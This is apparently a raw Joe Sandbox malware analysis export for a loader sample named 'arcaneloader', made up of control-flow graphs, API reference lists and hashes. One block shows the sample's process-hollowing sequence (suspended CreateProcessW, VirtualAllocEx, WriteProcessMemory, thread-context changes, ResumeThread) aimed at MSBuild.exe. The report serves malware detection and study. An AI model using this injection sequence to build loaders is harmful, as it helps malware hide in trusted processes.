8730->8738 8730->8751 8732 dcb0cb __freea 14 API calls 8734 dcc050 8732->8734 8735 dcc019 8733->8735 8743 dcb0cb __freea 14 API calls 8733->8743 8736 dcb0cb __freea 14 API calls 8734->8736 8737 dcb0cb __freea 14 API calls 8735->8737 8739 dcc063 8736->8739 8740 dcc023 8737->8740 8742 dcbfec 8738->8742 8744 dcb0cb __freea 14 API calls 8739->8744 8745 dcb0cb __freea 14 API calls 8740->8745 8741 dcc0ea 8746 dcb0cb __freea 14 API calls 8741->8746 8757 dcb9d5 8742->8757 8749 dcc00e 8743->8749 8750 dcc071 8744->8750 8745->8751 8752 dcc0f0 8746->8752 8747 dcb0cb 14 API calls __freea 8753 dcc08a 8747->8753 8785 dcbad3 8749->8785 8755 dcb0cb __freea 14 API calls 8750->8755 8751->8732 8756 dcc07c 8751->8756 8752->8723 8753->8741 8753->8747 8755->8756 8797 dcc148 8756->8797 8758 dcb9e6 8757->8758 8784 dcbacf 8757->8784 8759 dcb0cb __freea 14 API calls 8758->8759 8763 dcb9f7 8758->8763 8759->8763 8760 dcb0cb __freea 14 API calls 8762 dcba09 8760->8762 8761 dcba1b 8765 dcba2d 8761->8765 8766 dcb0cb __freea 14 API calls 8761->8766 8762->8761 8764 dcb0cb __freea 14 API calls 8762->8764 8763->8760 8763->8762 8764->8761 8767 dcba3f 8765->8767 8769 dcb0cb __freea 14 API calls 8765->8769 8766->8765 8768 dcba51 8767->8768 8770 dcb0cb __freea 14 API calls 8767->8770 8771 dcba63 8768->8771 8772 dcb0cb __freea 14 API calls 8768->8772 8769->8767 8770->8768 8773 dcba75 8771->8773 8774 dcb0cb __freea 14 API calls 8771->8774 8772->8771 8775 dcba87 8773->8775 8777 dcb0cb __freea 14 API calls 8773->8777 8774->8773 8776 dcba99 8775->8776 8778 dcb0cb __freea 14 API calls 8775->8778 8779 dcbaab 8776->8779 8780 dcb0cb __freea 14 API calls 8776->8780 8777->8775 8778->8776 8781 dcbabd 8779->8781 8782 dcb0cb __freea 14 API calls 8779->8782 8780->8779 8783 dcb0cb __freea 14 API calls 8781->8783 8781->8784 8782->8781 8783->8784 8784->8733 8786 dcbae0 8785->8786 8796 dcbb38 8785->8796 8787 dcbaf0 8786->8787 8788 dcb0cb __freea 14 API calls 8786->8788 8789 dcbb02 8787->8789 8790 dcb0cb __freea 14 API calls 8787->8790 8788->8787 8791 dcbb14 8789->8791 8792 dcb0cb __freea 14 API calls 8789->8792 8790->8789 8793 dcb0cb __freea 14 API calls 8791->8793 8794 dcbb26 8791->8794 8792->8791 8793->8794 8795 dcb0cb __freea 14 API calls 8794->8795 8794->8796 8795->8796 8796->8735 8798 dcc155 8797->8798 8799 dcc174 8797->8799 8798->8799 8803 dcbb3c 8798->8803 8799->8753 8802 dcb0cb __freea 14 API calls 8802->8799 8804 dcbc1a 8803->8804 8805 dcbb4d 8803->8805 8804->8802 8839 dcbc20 8805->8839 8808 dcbc20 __dosmaperr 14 API calls 8809 dcbb60 8808->8809 8810 dcbc20 __dosmaperr 14 API calls 8809->8810 8811 dcbb6b 8810->8811 8812 dcbc20 __dosmaperr 14 API calls 8811->8812 8813 dcbb76 8812->8813 8814 dcbc20 __dosmaperr 14 API calls 8813->8814 8815 dcbb84 8814->8815 8816 dcb0cb __freea 14 API calls 8815->8816 8817 dcbb8f 8816->8817 8818 dcb0cb __freea 14 API calls 8817->8818 8819 dcbb9a 8818->8819 8820 dcb0cb __freea 14 API calls 8819->8820 8821 dcbba5 8820->8821 8822 dcbc20 __dosmaperr 14 API calls 8821->8822 8823 dcbbb3 8822->8823 8824 dcbc20 __dosmaperr 14 API calls 8823->8824 8825 dcbbc1 8824->8825 8826 dcbc20 __dosmaperr 14 API calls 8825->8826 8827 dcbbd2 8826->8827 8828 dcbc20 __dosmaperr 14 API calls 8827->8828 8829 dcbbe0 8828->8829 8830 dcbc20 __dosmaperr 14 API calls 8829->8830 8831 dcbbee 8830->8831 8832 dcb0cb __freea 14 API calls 8831->8832 8833 dcbbf9 8832->8833 8834 dcb0cb __freea 14 API calls 8833->8834 8835 dcbc04 8834->8835 8836 dcb0cb __freea 14 API calls 8835->8836 8837 dcbc0f 8836->8837 8838 dcb0cb __freea 14 API calls 8837->8838 8838->8804 8840 dcbc32 8839->8840 8841 dcbb55 8840->8841 8842 dcb0cb __freea 14 API calls 8840->8842 8841->8808 8842->8840 8843->8728 11107 dcaca2 11110 dc8178 LeaveCriticalSection 11107->11110 11109 dcaca9 11110->11109

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00DDB0FF,00DDB0EF), ref: 00DDB323
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00DDB336
                                                                          • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 00DDB354
                                                                          • ReadProcessMemory.KERNELBASE(0000009C,?,00DDB143,00000004,00000000), ref: 00DDB378
                                                                          • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00DDB3A3
                                                                          • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00DDB3FB
                                                                          • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00DDB446
                                                                          • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00DDB484
                                                                          • Wow64SetThreadContext.KERNEL32(000000A0,02FC0000), ref: 00DDB4C0
                                                                          • ResumeThread.KERNELBASE(000000A0), ref: 00DDB4CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                          • API String ID: 2687962208-3857624555
                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                          • Instruction ID: 231ad74ea296bab695a5c1d32c745f34c46a6b1916c9d03f0e32b0056615e2ca
                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                          • Instruction Fuzzy Hash: C4B1087264064AEFDB60CF68CC80BDA73A5FF88724F168515EA08AB341D770FA51CB94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04ce0fe734eefe1fcabf1c7e69fff21834aa013b6522909b96277646cd822c0e
                                                                          • Instruction ID: 288e4a930c14a0b87eb4d8f6821f9d4497322c7ac85c46f8c13247bac6f1e54d
                                                                          • Opcode Fuzzy Hash: 04ce0fe734eefe1fcabf1c7e69fff21834aa013b6522909b96277646cd822c0e
                                                                          • Instruction Fuzzy Hash: 9C011474A04308CFCB14DF68D885BD9FBF0EB18710F4185AEA88897340EB74AA84CF95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 26 dc9dd3-dc9ddf 27 dc9e71-dc9e74 26->27 28 dc9e7a 27->28 29 dc9de4-dc9df5 27->29 30 dc9e7c-dc9e80 28->30 31 dc9df7-dc9dfa 29->31 32 dc9e02-dc9e1b LoadLibraryExW 29->32 33 dc9e9a-dc9e9c 31->33 34 dc9e00 31->34 35 dc9e1d-dc9e26 GetLastError 32->35 36 dc9e81-dc9e91 32->36 33->30 38 dc9e6e 34->38 39 dc9e5f-dc9e6c 35->39 40 dc9e28-dc9e3a call dcbc93 35->40 36->33 37 dc9e93-dc9e94 FreeLibrary 36->37 37->33 38->27 39->38 40->39 43 dc9e3c-dc9e4e call dcbc93 40->43 43->39 46 dc9e50-dc9e5d LoadLibraryExW 43->46 46->36 46->39
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,D6D5FCFF,?,00DC9EE2,?,?,00000000), ref: 00DC9E94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3664257935-537541572
                                                                          • Opcode ID: 76bd9407f615945589e143c9ca54b6fb1cf5785a4e197797f77447020ec6eed8
                                                                          • Instruction ID: e92e271d86a851d32c14faefc482c576d6b363f78c8943a99b47b3da718d3776
                                                                          • Opcode Fuzzy Hash: 76bd9407f615945589e143c9ca54b6fb1cf5785a4e197797f77447020ec6eed8
                                                                          • Instruction Fuzzy Hash: 50219231A02312ABC72197649C59F5AB75CAB61770F29011AF916E7391D730ED01C6F0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 47 dbbeb0-dbbf22 CreateFileA 48 dbbf29-dbbf37 47->48 49 dbbf3d-dbbf4a 48->49 50 dbbff2-dbc00c 48->50 53 dbc021-dbc054 GetFileSize 49->53 54 dbbf50-dbbf5d 49->54 52 dbc16a 50->52 52->48 53->52 56 dbc078-dbc0ce call dc4233 ReadFile 54->56 57 dbbf63-dbbf70 54->57 56->52 60 dbc011-dbc01c 57->60 61 dbbf76-dbbf83 57->61 60->52 64 dbbf89-dbbf96 61->64 65 dbc12c-dbc146 CloseHandle 61->65 67 dbbf9c-dbbfa9 64->67 68 dbc0f6-dbc108 call dc423c 64->68 65->52 71 dbbfaf-dbbfbc 67->71 72 dbc0d3-dbc0f1 67->72 68->52 75 dbc059-dbc073 CloseHandle 71->75 76 dbbfc2-dbbfcf 71->76 72->52 75->52 78 dbc14b-dbc169 call dc4241 76->78 79 dbbfd5-dbbfe2 76->79 82 dbbfe8-dbbfed 79->82 83 dbc10d-dbc127 CloseHandle 79->83 82->52 83->52
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 51a279d8e2281d87ae5dbb25e69db8d0bd50cc5faa3e81767d57f853d10ee4af
                                                                          • Instruction ID: 6c15bbe4f77dee12c876aff72d5def21af337261fdd95e1f323b9c2f6c06063e
                                                                          • Opcode Fuzzy Hash: 51a279d8e2281d87ae5dbb25e69db8d0bd50cc5faa3e81767d57f853d10ee4af
                                                                          • Instruction Fuzzy Hash: 557113B4A05209DFCB04DFACD9586EEBBF0FB48700F10852AE896AB350D77599458F62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 00DC6D2F
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,00DC3BEA), ref: 00DC6D3B
                                                                          • __dosmaperr.LIBCMT ref: 00DC6D42
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                          • String ID:
                                                                          • API String ID: 2744730728-0
                                                                          • Opcode ID: 0fcae115853ddc504751598fe96a095594baec1a25bb807f99a23660b1af63a0
                                                                          • Instruction ID: ccbcd6f13ac02e7182cfd51c86d435e3f5742bf31cac85dd37b190c51057bf2d
                                                                          • Opcode Fuzzy Hash: 0fcae115853ddc504751598fe96a095594baec1a25bb807f99a23660b1af63a0
                                                                          • Instruction Fuzzy Hash: 62014CB260021AAFDF159FA0DC16FAE7BA9EF40764F14405DB80297190DB71DE50DBB0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000002,?,00DC70B1,00DC83A0,00DC83A0,?,00000002,D6D5FCFF,00DC83A0,00000002), ref: 00DC7000
                                                                          • TerminateProcess.KERNEL32(00000000,?,00DC70B1,00DC83A0,00DC83A0,?,00000002,D6D5FCFF,00DC83A0,00000002), ref: 00DC7007
                                                                          • ExitProcess.KERNEL32 ref: 00DC7019
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 8894513972520337e445cfa9b8a2a26f2ab7815278c6d7ae0e573ac70f12cda0
                                                                          • Instruction ID: 9c49353cc8b8a75faece5df15b48aa33e3036533eefe03f775ec702f97f23d38
                                                                          • Opcode Fuzzy Hash: 8894513972520337e445cfa9b8a2a26f2ab7815278c6d7ae0e573ac70f12cda0
                                                                          • Instruction Fuzzy Hash: 53D06C31005209ABCF113FA0ED1AE8D7F2AEF44351B048019B9098A262DB36D996EBB4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 113 dca732-dca737 114 dca739-dca751 113->114 115 dca75f-dca768 114->115 116 dca753-dca757 114->116 118 dca77a 115->118 119 dca76a-dca76d 115->119 116->115 117 dca759-dca75d 116->117 121 dca7d4-dca7d8 117->121 120 dca77c-dca789 GetStdHandle 118->120 122 dca76f-dca774 119->122 123 dca776-dca778 119->123 124 dca78b-dca78d 120->124 125 dca7b6-dca7c8 120->125 121->114 126 dca7de-dca7e1 121->126 122->120 123->120 124->125 127 dca78f-dca798 GetFileType 124->127 125->121 128 dca7ca-dca7cd 125->128 127->125 129 dca79a-dca7a3 127->129 128->121 130 dca7ab-dca7ae 129->130 131 dca7a5-dca7a9 129->131 130->121 132 dca7b0-dca7b4 130->132 131->121 132->121
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00DCA621,00DDA088,0000000C), ref: 00DCA77E
                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00DCA621,00DDA088,0000000C), ref: 00DCA790
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType
                                                                          • String ID:
                                                                          • API String ID: 3000768030-0
                                                                          • Opcode ID: f85d5319bea8b4354089bf227d9f67ca419367ca6cfca576aa1f72b1b1e9d437
                                                                          • Instruction ID: aed67536a646d86552ae8c0238b821d73ccdaf71a36ddcda77d21b45ae8a5944
                                                                          • Opcode Fuzzy Hash: f85d5319bea8b4354089bf227d9f67ca419367ca6cfca576aa1f72b1b1e9d437
                                                                          • Instruction Fuzzy Hash: 7211A5715047474ACB304A3E8C88F22BAA4BB56338B3C071ED5B6C75F2C274D846D662

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00DD9D20,0000000C), ref: 00DC6E13
                                                                          • ExitThread.KERNEL32 ref: 00DC6E1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorExitLastThread
                                                                          • String ID:
                                                                          • API String ID: 1611280651-0
                                                                          • Opcode ID: 8f3c2ed4eef3eb15ed93981a33c55c7629f70fe45634892148173b7e3e2c5053
                                                                          • Instruction ID: 2cec155d0b0389ec0c97a5887a23c6f72d3f13e22c7ff262a23791ddbdad450d
                                                                          • Opcode Fuzzy Hash: 8f3c2ed4eef3eb15ed93981a33c55c7629f70fe45634892148173b7e3e2c5053
                                                                          • Instruction Fuzzy Hash: 5EF0AF70A00306AFDB01AFB0C85AF2E7BA5FF00710F14454EF0019B292CB71A901CBB1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 153 dcb0cb-dcb0d4 154 dcb0d6-dcb0e9 RtlFreeHeap 153->154 155 dcb103-dcb104 153->155 154->155 156 dcb0eb-dcb102 GetLastError call dcb7a0 call dcb757 154->156 156->155
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00DCBC39,?,00000000,?,?,00DCBB55,?,00000007,?,?,00DCC16E,?,?), ref: 00DCB0E1
                                                                          • GetLastError.KERNEL32(?,?,00DCBC39,?,00000000,?,?,00DCBB55,?,00000007,?,?,00DCC16E,?,?), ref: 00DCB0EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 485612231-0
                                                                          • Opcode ID: 560a4dbdfac8c514fcc5c8ed6b21ed289e975a4ba24aa9904bb45179df1cb73b
                                                                          • Instruction ID: 1015e248957c1bb2bf58b5a46aa9b43502bb4b0d0325b68ec9ada4205de3c8fe
                                                                          • Opcode Fuzzy Hash: 560a4dbdfac8c514fcc5c8ed6b21ed289e975a4ba24aa9904bb45179df1cb73b
                                                                          • Instruction Fuzzy Hash: 5EE0863110130567CB112BA0FC0EF597B5DDB44361F140026F508C7161D735C941C7B4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 238 dca00a-dca01e GetLastError 239 dca03a-dca044 call dc9bcf 238->239 240 dca020-dca028 call dc9b90 238->240 245 dca04a-dca052 call dcb807 239->245 246 dca046-dca048 239->246 247 dca02a-dca033 240->247 248 dca035 240->248 251 dca057-dca05d 245->251 249 dca0af-dca0b8 SetLastError 246->249 247->249 248->239 252 dca0bf-dca0c4 call dc835d 249->252 253 dca0ba-dca0be 249->253 254 dca05f-dca06e call dc9bcf 251->254 255 dca070-dca07e call dc9bcf 251->255 262 dca08f-dca095 call dcb0cb 254->262 263 dca097-dca0ac call dca31c call dcb0cb 255->263 264 dca080-dca08e call dc9bcf 255->264 271 dca0ae 262->271 263->271 264->262 271->249
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00DC6E25,00DD9D20,0000000C), ref: 00DCA00E
                                                                          • SetLastError.KERNEL32(00000000), ref: 00DCA0B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: fb778e48ea4c4bf5b4830559cb5dc8f1af0c55e9aab5f76cd0adf291b0940275
                                                                          • Instruction ID: 6465f08cc15df3d0d93ef5aa0d5a6ebdde1810012eea4336c6369c4f5f99a1cd
                                                                          • Opcode Fuzzy Hash: fb778e48ea4c4bf5b4830559cb5dc8f1af0c55e9aab5f76cd0adf291b0940275
                                                                          • Instruction Fuzzy Hash: 4811912120521FAE9A212FB9ACC6F273B59EB417FCB24012EF514D71A6EB51CC06A172

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 274 dc3b60-dc3be5 call dbe940 call dc3cc0 call dc3dc0 call dc6ce6 282 dc3bea-dc3bf7 274->282 283 dc3bfe-dc3c0c 282->283 284 dc3c55-dc3c6b 283->284 285 dc3c12-dc3c1f 283->285 287 dc3cb5 284->287 288 dc3c84-dc3c95 call dc441d 285->288 289 dc3c25-dc3c32 285->289 287->283 292 dc3c9a-dc3cb2 call dc3e30 call dc4241 288->292 289->292 293 dc3c38-dc3c45 289->293 297 dc3c4b-dc3c50 293->297 298 dc3c70-dc3c7f call dc3de0 293->298 297->287 298->287
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
